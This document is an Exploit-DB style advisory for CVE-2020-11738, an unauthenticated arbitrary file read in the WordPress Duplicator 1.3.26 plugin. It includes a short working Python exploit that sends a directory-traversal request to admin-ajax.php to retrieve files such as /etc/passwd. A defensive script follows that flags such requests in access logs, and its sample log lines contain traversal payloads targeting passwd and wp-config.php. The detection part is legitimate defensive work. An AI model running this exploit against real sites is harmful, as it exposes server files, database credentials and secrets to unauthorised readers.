Vendor: Duplicator
Author: nam3lum
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Read
CWE: 22
Product Name: Duplicator
Affected Version From: 1.3.26
Affected Version To: 1.3.26
Patch Exists: YES
Related CVE: CVE-2020-11738
CPE: a:wordpress:duplicator:1.3.26
Platforms Tested: Ubuntu 16.04
Year: 2021

WordPress Plugin Duplicator 1.3.26 – Unauthenticated Arbitrary File Read

This exploit allows an unauthenticated attacker to read arbitrary files on the server by abusing a vulnerability in the WordPress plugin Duplicator version 1.3.26. The vulnerability exists because the 'file' parameter of the 'duplicator_download' action handled by 'admin-ajax.php' is not sufficiently sanitized, so a value containing directory-traversal sequences is not confined to the plugin's backup directory. A single crafted HTTP GET request to that endpoint is enough to retrieve any file the web server process can read.

Mitigation:

Upgrade to the latest version of the WordPress Duplicator plugin.

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738

import sys
import requests

if len(sys.argv) != 3:
    print("Exploit made by nam3lum.")
    print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
    sys.exit(1)

target = sys.argv[1]  # base URL of the WordPress site
path = sys.argv[2]    # absolute path of the file to request, e.g. /etc/passwd

# In 1.3.26 the 'file' parameter of the duplicator_download AJAX action is not
# sanitized, so enough '../' segments escape the plugin's backup directory.
URL = target + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + path

output = requests.get(url=URL)
print(output.text)
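From a detection standpoint, the request shape used above is easy to pick out of web-server access logs. The following is an added example, not part of the Exploit-DB entry: it scans constructed Apache-style access-log lines for duplicator_download requests whose file parameter contains a parent-directory segment or an absolute path, undoing percent-encoding (including double encoding) before checking. The log lines, IP addresses and file names are all constructed samples.

```python
"""Flag duplicator_download requests with traversal in the 'file' parameter (CVE-2020-11738)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [16/Oct/2021:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../../etc/passwd HTTP/1.1" 200 1873
10.0.0.6 - - [16/Oct/2021:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3120
10.0.0.7 - - [16/Oct/2021:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=backup_20211016.zip HTTP/1.1" 200 40960
10.0.0.8 - - [16/Oct/2021:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 50
"""

# Pulls the request target out of the quoted "METHOD target HTTP/x.y" field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so double encoding cannot hide '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(file_param):
    """True if the decoded 'file' value is absolute or contains a '..' path segment."""
    value = fully_unquote(file_param).replace("\\", "/")
    return value.startswith("/") or ".." in value.split("/")


def flag_duplicator_reads(log_text):
    """Return the log lines that request duplicator_download with a traversal 'file' value."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)  # decodes one encoding layer
        if query.get("action") != ["duplicator_download"]:
            continue
        if any(is_traversal(candidate) for candidate in query.get("file", [])):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for hit in flag_duplicator_reads(SAMPLE_LOG):
        print("SUSPICIOUS:", hit)
```

Legitimate downloads from the plugin reference a bare archive name inside its backup directory, so a 200 response to a flagged request is a strong indicator that the file was actually served.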